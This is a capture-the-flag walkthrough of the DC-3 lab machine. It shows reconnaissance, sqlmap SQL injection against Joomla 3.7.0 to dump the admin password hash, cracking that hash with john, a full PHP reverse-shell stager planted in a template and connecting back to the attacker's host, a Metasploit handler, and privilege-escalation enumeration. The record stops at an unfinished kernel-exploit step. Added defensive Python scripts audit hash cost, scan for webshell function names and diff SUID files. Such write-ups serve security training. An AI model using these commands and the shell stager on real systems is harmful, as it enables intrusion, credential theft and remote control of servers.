DC-3 Target Machine Penetration Test

1. Penetration process

  • First, discover the host
root@kali:~# arp-scan 192.168.0.1/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f9:47:54, IPv4: 192.168.0.21
WARNING: host part of 192.168.0.1/24 is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 04:95:e6:0f:a2:10 Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.22 00:0c:29:a9:c5:31 VMware, Inc.
192.168.0.109 dc:8b:28:00:fa:32 Intel Corporate
  • Got the IP: 192.168.0.22

  • Probe the ports:

root@kali:~# nmap -sT -v -p- 192.168.0.22
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-29 15:41 CST
Initiating ARP Ping Scan at 15:41
Scanning 192.168.0.22 [1 port]
Completed ARP Ping Scan at 15:41, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:41
Completed Parallel DNS resolution of 1 host. at 15:41, 0.03s elapsed
Initiating Connect Scan at 15:41
Scanning 192.168.0.22 [65535 ports]
Discovered open port 80/tcp on 192.168.0.22
Completed Connect Scan at 15:41, 1.90s elapsed (65535 total ports)
Nmap scan report for 192.168.0.22
Host is up (0.00020s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:A9:C5:31 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.18 seconds
Raw packets sent: 1 (28B) | Rcvd: 1 (28B)
  • Only port 80 is open

  • Now let's go in and take a look

  • Welcome to DC-3.

    This time, there is only one flag, one entry point and no clues.

    To get the flag, you’ll obviously have to gain root privileges.

    How you get to be root is up to you - and, obviously, the system.

    Good luck - and I hope you enjoy this little challenge. :-)

  • Only one entry point?

  • The page also has a login form

  • Most likely the way in is through this login form

  • Let's look at the site's information:

root@kali:~# whatweb http://192.168.0.22/
http://192.168.0.22/ [200 OK] Apache[2.4.18], Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], IP[192.168.0.22], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json], Title[Home]
  • It's running the Joomla framework

  • First scan for the framework version

joomscan -u http://192.168.0.22/
[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.0.22/administrator/components
http://192.168.0.22/administrator/modules
http://192.168.0.22/administrator/templates
http://192.168.0.22/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.0.22/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.0.22/
root@kali:~# searchsploit Joomla 3.7.0
-----------------------------------------------------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
-----------------------------------------------------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
-----------------------------------------------------------------------------------
  • There is a SQL injection

  • Let's look at its injection point

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
  • Just run it with sqlmap directly
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --dbs
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
# Obviously joomladb is the site's database; it can of course also be confirmed with sqlmap
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --current-db
[15:55:43] [INFO] fetching current database
[15:55:43] [INFO] resumed: 'joomladb'
current database: 'joomladb'
# List the table names:
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb --tables
Database: joomladb
[76 tables]
-----------------------
| #__users |
-----------------------
# Not listing all 76 tables here
# List the columns
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" --columns
do you want to use common column existence check? [y/N/q]
# Choose yes here, then choose 1
Database: joomladb
Table: #__users
[5 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
# The columns are listed; dump the data
sqlmap -u "http://192.168.0.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
# Got the username; the password is a bcrypt hash
  • It can be cracked with john here, or brute-forced with Burp Suite

  • Let's crack it with john

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > /tmp/pwd
# note: with double quotes you need \$ to escape the $
# Then:
john /tmp/pwd
# Password obtained: snoopy
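The dumped value is a bcrypt hash ($2y$, cost 10), which is why john can grind through a wordlist against it. As an added example (not the post's code), the Python below parses the bcrypt format and audits dumped user rows against a minimum-cost policy; MIN_COST = 12 is an assumed threshold for the illustration.

```python
import re

# bcrypt modular-crypt format: $2<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r'^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$'
    r'(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$'
)

# Policy threshold assumed for this example; tune to your hardware budget.
MIN_COST = 12


def inspect_bcrypt(hash_str, min_cost=MIN_COST):
    """Parse a bcrypt hash and report its work factor against a minimum-cost policy."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError('not a bcrypt hash: %r' % hash_str)
    cost = int(m.group('cost'))
    return {
        'variant': m.group('variant'),
        'cost': cost,
        'rounds': 2 ** cost,          # key-setup iterations paid per password guess
        'salt': m.group('salt'),
        'meets_policy': cost >= min_cost,
    }


def audit_user_hashes(rows, min_cost=MIN_COST):
    """rows: iterable of (username, hash). Returns {username: problem} for weak or non-bcrypt hashes."""
    problems = {}
    for user, h in rows:
        try:
            info = inspect_bcrypt(h, min_cost)
        except ValueError:
            problems[user] = 'not bcrypt'
            continue
        if not info['meets_policy']:
            problems[user] = 'cost %d below minimum %d' % (info['cost'], min_cost)
    return problems


if __name__ == '__main__':
    # The row dumped from #__users above
    print(audit_user_hashes([('admin', '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu')]))
```

Raising the cost only slows each guess; a password like the one recovered here falls to a wordlist at any cost, so the policy check belongs next to a password-strength rule, not instead of one.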
  • After logging in

  • Added a webshell in the template (file named 1.php)

/*<?php /**/ error_reporting(0); $ip = '192.168.0.21'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
  • Then connected with msf
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.22
msf5 exploit(multi/handler) > exploit
# Then visit http://192.168.0.22/templates/beez3/1.php in the browser
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (38288 bytes) to 192.168.0.22
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.22:55430) at 2020-04-29 16:43:47 +0800

meterpreter >
# Connected
meterpreter > shell
# Drop into a shell
python -c 'import pty;pty.spawn("/bin/bash")' # get a proper tty shell
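From the defender's side, the planted 1.php is an unexpected PHP file in the templates tree whose source names a socket function as a string and calls eval() on what it reads. The Python below is an added example (not from the post or from Joomla) that walks a templates directory and reports PHP files missing from a baseline manifest or containing such constructs; the demo tree, the baseline set and the planted stand-in file are constructed for the illustration.

```python
import os
import re
import shutil
import tempfile

# Names typical of PHP reverse shells, matched either as a direct call (eval(...)) or as a
# quoted string (the stager above stores 'stream_socket_client' in $f and then calls $f()).
SUSPICIOUS = re.compile(
    r"(?<![\w$])(eval|create_function|stream_socket_client|fsockopen|socket_create|shell_exec|passthru)"
    r"(?=\s*\(|['\"])"
)


def scan_templates(root, baseline):
    """Walk a templates tree and return sorted (relative_path, reason) findings.

    baseline: set of relative paths of PHP files expected to exist (from the
    package manifest or a known-good copy of the same Joomla release)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith('.php'):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, 'r', errors='replace') as fh:
                src = fh.read()
            if rel not in baseline:
                findings.append((rel, 'not in baseline'))
            funcs = sorted(set(SUSPICIOUS.findall(src)))
            if funcs:
                findings.append((rel, 'suspicious calls: ' + ','.join(funcs)))
    return sorted(findings)


def build_demo_tree():
    """Constructed templates directory: one legitimate file plus one planted file."""
    root = tempfile.mkdtemp(prefix='joomla_templates_')
    os.makedirs(os.path.join(root, 'beez3'))
    with open(os.path.join(root, 'beez3', 'index.php'), 'w') as fh:
        fh.write("<?php defined('_JEXEC') or die; $doc = JFactory::getDocument(); echo $doc->title;\n")
    with open(os.path.join(root, 'beez3', '1.php'), 'w') as fh:
        # Non-functional stand-in that only keeps the stager's telltale shape: a socket
        # function referenced by name and eval() of data it reads ($target, $b undefined).
        fh.write("<?php error_reporting(0); $f = 'stream_socket_client'; if (is_callable($f)) { $s = $f($target); } eval($b);\n")
    return root


def scan_demo(baseline=frozenset({'beez3/index.php'})):
    """Build the demo tree, scan it, and clean up; returns the findings list."""
    root = build_demo_tree()
    try:
        return scan_templates(root, baseline)
    finally:
        shutil.rmtree(root)


if __name__ == '__main__':
    for finding in scan_demo():
        print(finding)
```

Point scan_templates at the real templates directory with a baseline generated from a clean install of the same Joomla version; the baseline check catches files that are added under a harmless name, while the content check catches an existing file that has been edited in place.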
  • Then check the users: cd /home

  • Found only one user, dc3

  • Nothing there

find / -user root -perm -4000 -print 2>/dev/null # find SUID files
  • Nothing usable found either

  • The only option left is to try a system-level (kernel) privilege escalation

uname -a # check kernel info
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
cat /etc/*release # check release info
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial
  • 3772… could not be downloaded….
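The SUID search a few steps back returns a list of paths that has to be eyeballed. As an added example (not from the post), the Python below diffs such a listing against a baseline of stock Ubuntu 16.04 setuid binaries and singles out entries outside package-managed directories; the baseline set and the sample find output are assumptions constructed for this illustration.

```python
# Illustrative baseline of root-owned SUID binaries on a stock Ubuntu 16.04 install
# (assumption for this example; generate yours from a known-good image of the same build).
BASELINE_SUID = frozenset({
    '/bin/fusermount', '/bin/mount', '/bin/ping', '/bin/ping6', '/bin/su', '/bin/umount',
    '/usr/bin/chfn', '/usr/bin/chsh', '/usr/bin/gpasswd', '/usr/bin/newgrp',
    '/usr/bin/passwd', '/usr/bin/pkexec', '/usr/bin/sudo',
    '/usr/lib/dbus-1.0/dbus-daemon-launch-helper', '/usr/lib/openssh/ssh-keysign',
    '/usr/lib/policykit-1/polkit-agent-helper-1',
})

# Prefixes where package-managed setuid binaries normally live; anything else is worth a look.
SYSTEM_PREFIXES = ('/bin/', '/sbin/', '/usr/bin/', '/usr/sbin/', '/usr/lib/', '/lib/')

# Constructed output of the find command above (not the real DC-3 listing):
# the baseline entries plus two planted files.
SAMPLE_FIND_OUTPUT = """\
/bin/fusermount
/bin/mount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup-helper
/tmp/.x
"""


def audit_suid(find_output, baseline=BASELINE_SUID):
    """Classify each path from `find / -user root -perm -4000` against the baseline."""
    found = {line.strip() for line in find_output.splitlines() if line.strip()}
    unexpected = sorted(found - baseline)
    return {
        'unexpected': unexpected,
        # unexpected AND outside package-managed directories: highest priority to triage
        'outside_system_dirs': [p for p in unexpected if not p.startswith(SYSTEM_PREFIXES)],
        # baseline entries that disappeared (removed or had the bit stripped); worth noting too
        'missing': sorted(baseline - found),
    }


if __name__ == '__main__':
    for key, paths in audit_suid(SAMPLE_FIND_OUTPUT).items():
        print(key, paths)
```

Feed it the saved output of the find command from a host under review; on a box like DC-3 the interesting result is usually an empty "unexpected" list, which is exactly what pushes an attacker toward the kernel route the post ends up on.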